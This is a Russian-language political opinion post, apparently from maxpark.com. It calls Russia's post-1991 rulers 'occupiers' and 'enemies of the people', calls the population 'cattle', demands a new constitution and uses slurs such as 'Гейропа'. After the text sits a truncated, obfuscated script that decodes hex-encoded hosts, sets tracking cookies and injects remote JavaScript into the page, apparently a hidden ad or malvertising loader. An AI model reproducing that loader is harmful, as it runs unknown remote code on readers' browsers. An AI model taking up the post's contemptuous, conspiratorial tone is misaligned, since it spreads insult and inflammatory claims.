ВЕЛИКИЙ ОБМАН НАШЕГО БЕЗУМНОГО НАРОДА, ЖИВУЩЕГО В СОСТОЯНИИ БЫДЛА

На модерации Отложенный  
 

 

 
Глубоко убежден: если мы не преодолеем рабство внутри себя, никакие «30-40 лет» – которыми нас настойчиво увещевают «реформаторы» - не помогут. Даже если состоится или не состоится в очередной раз майдан или  «бунт бессмысленный и беспощадный».Беспощадный потому, что люди натерпелись сверх меры, а бессмысленный потому, что самодержавный и феодальный Основной Закон наш ведь остается и по сей день охраняемый  президентом  которого сделали гарантом этого безумия. Преодолеть это тысячелетнее проклятие в наших условиях очень трудно, однако абсолютно необходимо. И именно серьезное, взрослое осознание этого может избавить нас и от «бунта», и от дальнейших безобразий «дикого рынка». От полной деградации и вымирания нации, которая в сегодняшних условиях неизбежна.
Но для этого и надо составить, обсудить и принять новый, по-настоящему истинный , справедливый, человеческий, праведный и святой , божий и  народный , истинно демократический, внятный и четкий Основной Закон. Это - фундамент, без него бесполезны «инновации», «перестройки», «вертикали», Олимпиада и Сколково. Прежде всего, нам надо четко и недвусмысленно определиться: чего мы на самом деле хотим, зачем и для чего живем. Ведь не для того же, в конце-то концов, чтобы «есть от пуза», пить «до чертиков», купаться в роскоши и размножаться бездумно. Да к тому же становиться обслуживающим персоналом трубы. Конечно, экономическое процветание необходимо. Но не ради самого «экономического процветания». Производство ради самого производства бессмысленно! Как образно было сказано в одной рекламе: «Деньги нельзя есть!» В том-то и дело. Не деньги важны сами по себе, а то, что можно на них купить. А это надо еще создать. И вообще живет человек не для того, чтобы есть, а ест для того, чтобы жить. То есть не только есть и размножаться, а развиваться и создавать и творить..
Да, я говорю вещи давно известные, однако явно не воспринятые  нашим безумным в доску народом живущем как быдло, кто поддерживает методы Гайдара-Чубайса, Грефа-Кудрина, Путина-Медведева и их последователей и единомышленников. 20 лет доказали это вполне однозначно, но тенденция в политике наших бывших «младореформаторов» не меняется. И даже густой поток халявных «нефтедолларов» не спасает. И не спасет. Потому что суть в другом. Работать надо, а не копить денежки на своих счетах, отечественных или зарубежных. Думать о своей стране, а не оглядываться постоянно на Америку и досточтимый Запад и Гейропу. И уж тем более не продаваться им. Дороги строить, заводы и фабрики восстанавливать, малый и средний бизнес развивать, а главное – налаживать отношения   между людьми , а точнее народом и  Властью , Государством! Жить ДУХОВНОЙ жизнью, а не животной. Неужели до сих пор никак не могут понять простейшую эту истину наши политики? Или умышленно не хотят? Ну, а мы, граждане и народ  на что?
Чем внимательнее смотришь вокруг, тем четче видишь: оккупанты и враги народа всеми средствами пытаются сделать нас быдлом, напрочь лишить человеческого достоинства - так, чтобы мы жили и поступали не по-своему, то есть не по-человечески, а – по - ихнему, то есть так, как они хотятЧтобы подчинялись им, работали на них, а они будут распоряжаться всем. Они, типа «избранные». А мы «в формате». И самое главное, о чем они заботятся сейчас - чтобы мы не опомнились, не увидели КТО ЕСТЬ КТО и ЧТО ЕСТЬ ЧТО. Потому что это для них самое опасное. Не настолько все же они глупы, чтобы не понимать, кто они есть на самом деле и что они с нами делают. Именно страх мешает оккупантам действовать более открыто, более решительно и не сразу объявить нас, соотечественников своих, быдлом и резко сократить население «Рашки», а делать это очень осторожно и постепенно. Потому что если мы осознаем то, что происходит, они мгновенно лишатся своей «избранности» и получат то, что заслужили на самом деле.
Тут, думаю, очень уместно вспомнить еще одно, чем многие из них для своих целей пользуются. В частности - слова якобы чтимого ими Христа. Можно много сказать по поводу того, как лицемерно используют они Его заповеди «не суди», «не кради», «не убий», «не прелюбодействуй» - сами легко нарушая их, а нас принуждая их исполнять под угрозой и суда, и убийства, и всего остального. Но я приведу лишь одну цитату из «Евангелия от Матфея», которая весьма соответствует теме этой статьи: «Берегитесь лжепророков, которые приходят к вам в овечьей одежде, а внутри суть волки хищные. По плодам их узнаете их... Так всякое дерево доброе приносит и плоды добрые, а худое дерево приносит и плоды худые... Итак по плодам их узнаете их». Разве 20 лет не доказали всем и воочию, кто пришел к власти в нашей стране в 1991-м году и орудует в ней до сих пор? Разве не видно каждому, какие «плоды» приносят они? Но что же еще сказал Христос о «худых деревьях»? А вот что: «Всякое дерево, не приносящее плода доброго, срубают и бросают в огонь». Не мешает тут вспомнить и то, что Христос сделал с бесплодной смоковницей в свое время....
Но тогда почему же? Почему в России постоянно «народ безмолвствует», как тонко подметил, в частности, Александр Сергеевич Пушкин в «Борисе Годунове», а власть орудует лишь в свою пользу? Вот ведь еще 170 лет назад некий французский дипломат маркиз Астольф де Кюстин, посетивший Николаевскую Россию, в своей книге «Россия в 1839» написал так: «...Долго ли будет провидение держать под гнетом этот народ, цвет человеческой расы? Когда пробьет для него час освобождения, больше того - час торжества? Кто знает? Кто возьмется ответить на этот вопрос?»  Многие пытались ответить на этот вопрос. Некоторые - не словами, а делом. Увы. Пока что-то не очень-то удается. Беда в том, что слишком въелся в сознание наших людей совершенно ничем не оправданный, с точки зрения здравого смысла, какой-то чуть ли не священный трепет перед всякой властью. «Я начальник - ты дурак, ты начальник - я дурак». А уж Главный правитель - Царь-батюшка ли, Генсек ли, Президент ли теперь - это уж и вовсе почти что Бог. И мы терпим все, что бы он и его присные ни делали. И либо на самом деле верим в их оправдания, либо делаем вид, что верим. Но почему? Неужели и на самом деле мы быдло?
Ведь мы же знаем, весь народ, что все в стране и нашей жизни не так как пел Владимир Высоцкий, не так как надо. Властитель, тем более, избранный нами же (пусть и с подтасовками), абсолютно такой же человек, как и мы, порой даже хуже многих, и далеко не всегда очень умный. Но стоит ему оказаться там, то есть у рычагов власти... Понятно, почему «безмолвствует» народ. Страх это, а никакая не любовь, разумеетсяПотому что у Его Превосходительства - механизмы и рычаги для подавления нашего с вами человеческого достоинства и воли. Тысячи, сотни тысяч обманутых, купленных, запуганных бывших людей вынуждены подчиняться – они охраняют и поддерживают противоестественную эту Систему Власти  и  Господства и усиленно пытаются сделать нас такими же, как они, - обманутыми, бессловесными, проданными. бывшими людьми. Потому и говорю я о нашем с вами Основном Законе, ельцинском. самодержавном и самоуправном. Пока мы не изменим его, ничего хорошего в нашей стране не будет, даже если мы с вами будем очень стараться.
До тех пор, пока по Конституции глава государства, а вместе с ним и высшие чиновники считаются «неприкасаемыми», то есть «неприкосновенными», фактически несменяемыми, безальтернативными, пока им подвластно все и вся - и, соответственно, «по вертикали», «высшим» подвластны все «низшие», - то есть законом закреплена фактическая пирамидальная безответственность  власти и наше рабство, «час освобождения» не пробьет. Ни к какой власти не рвусь. А просто не могу видеть, что в стране родной творится. Нормальному человеку, думаю, никакой власти особенной вовсе не нужно, кроме одной – над своими слабостями и недостатками, над собой. Власть над другими нужна тем, у кого свободы, достоинства и способностей нет. Они думают, что, приобретя власть над другими, приобретут и достоинство, и свободу, и способности якобы. Иллюзия! Доказано многократно...
Да я ведь, собственно, ни на что и не претендую. Я просто, согласно статьям 28 и 29 нашего Основного Закона и статье 19 «Всеобщей декларации прав человека ООН», выражаю свои мысли, пишу то, что на самом деле думаю. Хотите возразить? Ради Бога! Буду только рад – значит, читали. Но возражения принимаю только по существу. И с аргументами - тоже по существу. С обоюдным выслушиванием друг друга. Так что давайте лучше не кричать друг на друга, как в «ток-шоу»,демонстрируя болтовню, а думать. И - главное! - работать. Действовать на общее благо, каждый в меру своих сил.  Хотя все чаще и чаще я слышу даже с телеэкрана похожие мысли. А слово «оккупация» или иго, в отношении нашей жизни стало уже привычным для очень многих.

<script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>